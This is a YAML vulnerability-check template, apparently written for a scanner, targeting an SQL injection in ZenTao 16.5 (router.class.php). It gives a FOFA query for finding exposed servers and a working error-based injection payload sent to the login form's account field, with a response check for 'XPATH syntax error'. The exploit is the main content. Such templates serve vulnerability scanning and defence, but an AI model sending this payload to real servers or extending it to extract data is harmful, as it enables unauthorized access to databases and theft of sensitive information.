product: 禅道项目管理系统
vName: 禅道 16.5 router.class.php SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 禅道 16.5 router.class.php 文件存在SQL注入漏洞，攻击者通过漏洞可以获取数据库敏感信息，危害服务器安全。
version: ''
note: ''
search:
  FOFA: app="易软天创-禅道系统"
protocol: http
link: https://blog.csdn.net/weixin_45530380/article/details/132276795
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /user-login.html
      data: account=admin' and (select extractvalue(1,concat(0x7e,(select user()),0x7e)))-- -
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - XPATH syntax error
            logic: and